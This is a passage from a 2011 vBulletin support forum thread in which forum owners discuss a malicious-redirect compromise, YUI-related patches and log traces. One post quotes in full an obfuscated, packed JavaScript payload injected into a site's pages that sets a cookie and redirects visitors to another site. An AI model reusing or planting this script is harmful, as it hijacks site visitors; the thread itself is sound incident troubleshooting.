vBulletin 3.x and 4.x Redirect Security Exploit

Collapse
This topic is closed.
X
X
 
  • Time
  • Show
Clear All
new posts
  • PixelGal
    Senior Member
    • May 2004
    • 215
    • 3.6.x

    #61
    It looks like there has been a 4-1-3_Patch_Level_1 patch released since I last upgraded. Has anyone been hit after installing that one?

    Comment

    • Marvin Hlavac
      Member
      • Sep 2007
      • 98

      #62
      Originally posted by Marvin
      does the 3.8.7 PL1 include the latest YUI, or it doesn't?

      Originally posted by Zachery
      Right now, i Don't believe it does

      Originally posted by Brian
      Thanks for the confirmation of a half-patch.
      Patching on my own, again...
      For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?

      Comment

      • Steve Machol
        Former Customer Support Manager
        • Jul 2000
        • 154488

        #63
        Originally posted by Marvin Hlavac
        For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?
        Yes, 4.1.4.
        Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
        Change CKEditor Colors to Match Style (for 4.1.4 and above)

        Steve Machol Photography


        Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


        Comment

        • BirdOPrey5
          Senior Member
          • Jul 2008
          • 9613
          • 5.6.3

          #64
          Originally posted by Marvin Hlavac
          For those of us who are not as technically skilful as Brian, is a vBulletin (3.8.x and 4.x) with the current YUI in the works?
          Originally posted by Steve Machol
          Yes, 4.1.4.
          I believe the logically correct answer is NO, unless there is another 3.8 patch in the works?

          Comment

          • Paul M
            Former Lead Developer
            vB.Com & vB.Org
            • Sep 2004
            • 9886

            #65
            Originally posted by Ramsesx
            I don't get why there is a security patch, so far as it is known, there are only two yui files affected, one isn't in vB3.x and the other one was patched already. An explanation would be appreciated.
            Caution I guess, but it seems to me its probably going to cause more issues than its worth.

            Btw, afaik, neither affected file exists in 3.x. The only way a 3.x forum would have had access to them is if they were using the remote hosted option, but yahoo patched them ages ago.
            Baby, I was born this way

            Comment

            • Bacon Butty
              Senior Member
              • Jun 2005
              • 162

              #66
              Originally posted by briansol
              check your logs. no one really knows and any log data you have may help find the leak.
              Which logs mate?

              Having a nightmare with this!

              Any idiot guides out there? - The 'fix' from vB resolved it for a day.

              Comment

              • Steve Machol
                Former Customer Support Manager
                • Jul 2000
                • 154488

                #67
                Originally posted by Bacon Butty
                Which logs mate?

                Having a nightmare with this!

                Any idiot guides out there? - The 'fix' from vB resolved it for a day.
                Please start your own thread with all the relevant details. Thank you.
                Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                Change CKEditor Colors to Match Style (for 4.1.4 and above)

                Steve Machol Photography


                Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                Comment

                • Joep11
                  Member
                  • Apr 2005
                  • 45

                  #68
                  One of our sites was hit by the redirect from google.

                  In Google results page I right-clicked on our link and chose 'save link', so I saved our page without visiting it. I opened the page in notebook and this is what I got:

                  <html><head></head><body><script type=
                  "text/javascript">var vbsp='CA433C43';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('o a=["\\A\\c\\e\\l\\d\\y\\c","\\k\\c\\e\\l\\d\\y\\c","\\B\\x\\c\\L\\f\\d\\q\\c\\k\\h","\\e\\b\\ M\\N\\l\\O\\e\\q\\d\\j\\A","\\w\\b\\b\\J\\d\\c","\\h","\\B\\x\\f\\r\\e\\n\\h\\i","\\G\\H\\ k\\f","\\I","\\p\\b\\w\\r\\e\\d\\b\\j","\\n\\e\\e\\f\\Q\\i\\i\\D\\d\\p\\c\\P\\k\\e\\b\\q\\ c\\C\\d\\j\\D\\b\\i\\m\\b\\S\\j\\p\\b\\r\\m\\C\\f\\n\\f\\T\\d\\m\\h"];E z(u,t){o g=F K();g[a[1]](g[a[0]]()+R);o s=a[2]+g[a[3]]();v[a[4]]=u+a[5]+t+s+a[6]};z(a[7],a[8]);v[a[9]]=a[V]+U;',58,58,'||||||||||_0x95ee|x6F|x65|x69|x74|x70|_0x601cx4|x3D|x2F|x6E|x73|x54|x64|x68|va r|x6C|x72|x61|_0x601cx5|_0x601cx3|_0x601cx2|document|x63|x20|x6D|ipbcc|x67|x3B|x2E|x66|fun ction|new|x76|x62|x31|x6B|Date|x78|x47|x4D|x53|x32|x3A|86400000|x77|x3F|vbsp|10'.split('|' ),0,{}))</script></body></html>
                  When I open the page with this code in IE it goes to file2store.com.

                  I can't find this code in my templates. Is it of any use defining where it comes from?

                  Comment

                  • Joep11
                    Member
                    • Apr 2005
                    • 45

                    #69
                    I also noticed the following...

                    In the error logs it shows:

                    [Fri Jun 03 16:52:11 2011] [error] [client 77.245.91.19] PHP Warning: Call-time
                    pass-by-reference has been deprecated - argument passed by value; If you would
                    like to pass it by reference, modify the declaration of [runtime function
                    name](). If you would like to enable call-time pass-by-reference, you can set
                    allow_call_time_pass_reference to true in your INI file. However, future
                    versions may not support this any longer. in
                    /var/www/vhosts/nationaalautoforum.nl/httpdocs/includes/class_bbcode.php(172) :
                    eval()'d code on line 7, referer: http://www.nationaalautoforum.nl/mijn-auto/

                    many times. It started showing when the redirect stopped working.

                    Anybody?

                    Comment

                    • djbaxter
                      Senior Member
                      • Aug 2006
                      • 1418
                      • 4.2.5

                      #70
                      That's just a PHP warning but what's interesting is it implicates class_bbcode.php - the first time I've seen that specifically.
                      Psychlinks Web Services Affordable Web Design & Site Management
                      Specializing in Small Businesses and vBulletin/Xenforo Forums

                      Comment

                      • Joep11
                        Member
                        • Apr 2005
                        • 45

                        #71
                        The redirect is back and the errors have stopped! Why?

                        The last error was at 17:12:22

                        From access log:

                        77.245.91.19 - - [03/Jun/2011:17:12:16 +0200] "GET
                        /18905-fiat-presenteert-ruim-aangeklede-fiat-500-twinair.html HTTP/1.0" 200
                        10354 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
                        Heritrix ; +http://www.buzzcapture.com)"
                        66.249.72.100 - -
                        [03/Jun/2011:17:12:16 +0200] "GET /volvo/ HTTP/1.1" 200 18828 "-" "Mozilla/5.0
                        (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
                        77.245.91.19 -
                        - [03/Jun/2011:17:12:19 +0200] "GET /18939-vanafprijs-chevrolet-aveo.html
                        HTTP/1.0" 200 10246 "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0
                        (compatible; Heritrix ; +http://www.buzzcapture.com)"
                        77.245.91.19 - -
                        [03/Jun/2011:17:12:22 +0200] "GET /18973-audi-prijst-q3.html HTTP/1.0" 200 10258
                        "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
                        Heritrix ; +http://www.buzzcapture.com)"
                        93.125.201.157 - -
                        [03/Jun/2011:17:12:25 +0200] "POST /register.php?do=checkdate HTTP/1.1" 200 5513
                        "http://www.nationaalautoforum.nl/register.php" "Mozilla/4.0 (compatible; MSIE
                        8.0; Windows NT 6.1; WOW64; Trident/4.0; GTB7.0; SLCC2; .NET CLR 2.0.50727; .NET
                        CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C)"

                        77.245.91.19 - - [03/Jun/2011:17:12:25 +0200] "GET
                        /18916-nissan-leaf-veiligste-ev-ooit-met-5-ncap-sterren.html HTTP/1.0" 200 10380
                        "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
                        Heritrix ; +http://www.buzzcapture.com)"
                        77.245.91.19 - -
                        [03/Jun/2011:17:12:29 +0200] "GET
                        /18917-belastingvoordeel-zuinige-auto-s-verdwijnt.html HTTP/1.0" 200 11546
                        "http://www.nationaalautoforum.nl/autonieuws/" "Mozilla/5.0 (compatible;
                        Heritrix ; +http://www.buzzcapture.com)"

                        There is nothing strange to see...?

                        Comment

                        • Bacon Butty
                          Senior Member
                          • Jun 2005
                          • 162

                          #72
                          Originally posted by Steve Machol
                          Please start your own thread with all the relevant details. Thank you.
                          I have;

                          http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

                          And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

                          Another instance which makes it beyond any doubt that my forums future lies with XenForo.

                          Comment

                          • djbaxter
                            Senior Member
                            • Aug 2006
                            • 1418
                            • 4.2.5

                            #73
                            Originally posted by Bacon Butty
                            I have;

                            http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

                            And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

                            Another instance which makes it beyond any doubt that my forums future lies with XenForo.
                            Well, I have no intention of moving to Xenforo but I have to agree that pareticular response from Steve seemed rather belligerent and unhelpful.
                            Psychlinks Web Services Affordable Web Design & Site Management
                            Specializing in Small Businesses and vBulletin/Xenforo Forums

                            Comment

                            • Steve Machol
                              Former Customer Support Manager
                              • Jul 2000
                              • 154488

                              #74
                              Originally posted by Bacon Butty
                              I have;

                              http://www.vbulletin.com/forum/showthread.php/380956-Yahoo-YUI-Security-Exploit-Patch-Not-Working

                              And with respect, that type of response pretty much epitomises the piss poor response by vBulletin towards what should be an urgent matter.

                              Another instance which makes it beyond any doubt that my forums future lies with XenForo.
                              Sorry you feel that way but it is easier to solve issues when people start their own threads rather than hijacking someone else's thread. We have been asking people to do this for 10 years now, even when the old Devs were in charge.
                              Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                              Change CKEditor Colors to Match Style (for 4.1.4 and above)

                              Steve Machol Photography


                              Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                              Comment

                              • Steve Machol
                                Former Customer Support Manager
                                • Jul 2000
                                • 154488

                                #75
                                Originally posted by djbaxter
                                Well, I have no intention of moving to Xenforo but I have to agree that pareticular response from Steve seemed rather belligerent and unhelpful.
                                This was 'beliigerent'?

                                Originally posted by Steve Machol
                                Please start your own thread with all the relevant details. Thank you.
                                For the record we have always asked people to start theie own thread with their specific issue. That way we can concentrate or their problem and not have it diluted by a bunch of other people using the same thread for issues that may or may not be identical.

                                Sorry if that offended anyone, but this is nothing new.
                                Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
                                Change CKEditor Colors to Match Style (for 4.1.4 and above)

                                Steve Machol Photography


                                Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


                                Comment

                                Related Topics

                                Collapse

                                Working...